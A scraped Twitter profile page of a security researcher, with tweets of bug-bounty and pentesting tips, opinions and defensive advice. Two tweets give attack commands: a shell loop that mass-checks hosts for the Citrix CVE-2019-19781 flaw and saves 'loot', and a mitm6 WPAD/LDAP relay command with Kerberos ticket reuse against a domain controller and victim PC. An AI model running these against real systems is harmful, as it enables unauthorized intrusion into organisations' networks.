Paul Seekamp

@nullenc0de

I spend a significant amount of time reading security stuff.

ɴ̵̢̧̮̮̹̖̳͍̳̣̻̰̯̜̰̰̭̑̌̊̿̀̾͑̆̀̈́
Vrijeme pridruživanja: siječanj 2012.

Tweetovi

Blokirali ste korisnika/cu @nullenc0de

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @nullenc0de

  1. Prikvačeni tweet
    7. sij

    *UPDATE* The guide is at 48 pages now. Easy to follow, beginner/intermediate's guide you can keep in your bag or on your PC. No DRM protections, just a plain PDF. If you have purchased it before, log in and download your free updated copy.

    Poništi
  2. proslijedio/la je Tweet
    3. velj

    Do you have a big file w/ URLs w/ many of them being default pages, wildcards etc? Use 's get-title hack to grep out common titles: cat urls.txt | get-title -c 300 > titles.txt cat titles.txt | grep -v "PATTERN" | awk -F '[()]' '{print $2}'

    Poništi
  3. 31. sij

    If browsing to http://IP:80 responds with "Fastly error: unknown domain:" can you take that over somehow?

    Poništi
  4. 30. sij

    Windows is gonna break your stuff by forcing LDAP Signing and channel binding. 🙃

    Poništi
  5. 24. sij

    I'm just connecting to modems via Putty like it's 2001!

    Poništi
  6. 24. sij

    If some python guru fixed up and added the ldap relay attack. You would be the hero of many... Just saying.

    Poništi
  7. 23. sij

    When you see this for mobile apps: P4| $300-$500.

    Poništi
  8. proslijedio/la je Tweet
    22. sij

    Here is the link to the SpecterOps Adversary Tactics: PowerShell course material: Enjoy! For information about our current training offerings, information can be found here: (4/4)

    Prikaži ovu nit
    Poništi
  9. 22. sij

    Having trouble findings endpoints? Normal tricks failing? Try making a new wordlist by running wayback against the root domain (and all subdomains). Even if it's not in scope! echo | waybackurls |cut -d '/' -f4- |sort -u |tee wordlist.txt

    Poništi
  10. proslijedio/la je Tweet
    15. sij

    If you're doing the same thing ten times a day, automate it. If you have a regular task and it's eating into your time, automate it. If you have a bunch of noisy data and you're manually filtering through it, automate it. Retyping the same thing? SCRIPT IT AND AUTOMATE IT

    Prikaži ovu nit
    Poništi
  11. 17. sij

    CISSP is not for consultants anymore.

    Poništi
  12. 16. sij

    For all you the defenders working on CVE-2019-19781. made excellent notes on the Citrix analysis.

    Poništi
  13. 14. sij

    Interesting. almost every /oauth/token request I have analyzed responds with "Cache-Control: max-age=0, private, must-revalidate". According to RFC-6749 and RFC-6819 the oAuth client should set in client request HTTP headers to "Cache-Control: no-store" and "Pragma: no-cache".🤷‍♂️

    Poništi
  14. 14. sij
    Poništi
  15. 13. sij

    Want Free💰? Jump on the Citrix wagon! Pick a program on git clone cd check-cve-2019-19781 pip3 install -r requirements.txt cat hosts.txt | while read url ; do cve-2019-19781 ;done > loot.txt 2>&1 cat loot.txt | grep appear

    Poništi
  16. 12. sij

    Big things in 2020! Intro to my Udemy course(s)... Very early stages, but its gonna be fun and hopefully educational🙂

    Poništi
  17. proslijedio/la je Tweet
    8. sij

    Windows Command Line cheatsheet (part 2): WMIC - Bookmark this! Saved my day several times 😉

    Poništi
  18. proslijedio/la je Tweet
    7. sij
    Poništi
  19. 7. sij

    It's 2020 and you have NetBIOS, LLMNR, SMB sign off but WPAD is still on. EWW! mitm6 -i eth0 -d <domain> -t ldaps://<DomainController> -wh attacker-wpad --delegate-access export KRB5CCNAME=<TGS_ccache_file> –k –no-pass <VictimPC>

    Poništi
  20. 7. sij

    For the people worried about Iran's cyber attacks: - Apply security updates, use MFA. - Employ endpoint detection technology that detects malware and abuse of native system tools. - User Awareness Training. - Maybe talk with a distributed denial of service mitigation vendor.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·